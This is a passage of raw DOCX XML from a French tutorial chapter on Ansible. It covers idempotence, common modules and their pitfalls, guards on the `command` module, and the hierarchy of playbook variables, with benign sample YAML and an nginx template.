                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tâches ordonnées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chacune doit être idempotente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="239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handlers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="338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Actions différées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Déclenchées par </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>notify</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2394"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>vars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3380"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Surchargées par groupe ou extra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="239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roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="338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Organisation réutilisable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Structure normalisée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IDEMPOTENCE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Propriété d'une tâche qui ne modifie rien si l'état désiré est déjà atteint. Un module bien utilisé indique </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ok</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> au second passage, pas </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>changed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>76.2 Les modules qui comptent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ansible fournit des centaines de modules. Cinq familles couvrent l'essentiel d'une configuration de serveur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.286 — Six modules courants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57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Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="265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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3579"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>apt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dnf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Paquets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2651"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>state: latest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> rend non reproductible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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template</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>copy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Fichiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Droits à préciser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3579"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>service</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>systemd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2651"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>enabled</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> distinct de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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user</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Comptes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Mot de passe hashé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3579"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>lineinfile</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>blockinfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Édition de fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2651"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À éviter si un template suffit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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command</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Exécution brute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Non idempotent par défaut</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`COMMAND` CASSE L'IDEMPOTENCE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ansible.builtin.command</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> s'exécute à chaque passage. Utilisez un module dédié, ou ajoutez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>creates:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>changed_when:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour conditionner l'exécution et le compte rendu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux garde-fous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Vérifier qu'une tâche n'a pas déjà été faite</w:t>
        <w:br/>
        <w:t>- name: Extraire l'archive</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ansible.builtin.command:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cmd: tar -xzf /tmp/app.tgz -C /opt</w:t>
        <w:br/>
        <w:t xml:space="preserve">    creates: /opt/app/bin/serveur</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ne pas signaler un changement quand rien n'a changé</w:t>
        <w:br/>
        <w:t>- name: Vérifier la version</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ansible.builtin.command: /opt/app/bin/serveur --version</w:t>
        <w:br/>
        <w:t xml:space="preserve">  register: version</w:t>
        <w:br/>
        <w:t xml:space="preserve">  changed_when: false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>76.3 Variables et modèles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les variables se hiérarchisent : rôle, groupe, hôte, ligne de commande. La priorité est stricte et source de confusion : documentez vos conventions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Variables hiérarchisées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group_vars/prod.yml</w:t>
        <w:br/>
        <w:t>env: production</w:t>
        <w:br/>
        <w:t>domaine: exemple.fr</w:t>
        <w:br/>
        <w:t>replicas: 3</w:t>
        <w:br/>
        <w:t>log_level: info</w:t>
        <w:br/>
        <w:br/>
        <w:t># host_vars/web1.yml</w:t>
        <w:br/>
        <w:t>ansible_host: 203.0.113.11</w:t>
        <w:br/>
        <w:br/>
        <w:t># Utilisation dans un modèle Jinja2</w:t>
        <w:br/>
        <w:t>server {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    listen 443 ssl;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server_name {{ domaine }};</w:t>
        <w:br/>
        <w:t xml:space="preserve">    access_log /var/log/nginx/{{ env }}.access.log;</w:t>
        <w:br/>
        <w:t>{% for up in upstreams %}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # {{ up }}</w:t>
        <w:br/>
        <w:t>{% endfor %}</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.287 — Cinq niveaux de priorité</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91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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Priorité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>roles/x/defaults/main.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>La plus faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Groupe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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group_vars/all.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Groupe spécifique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
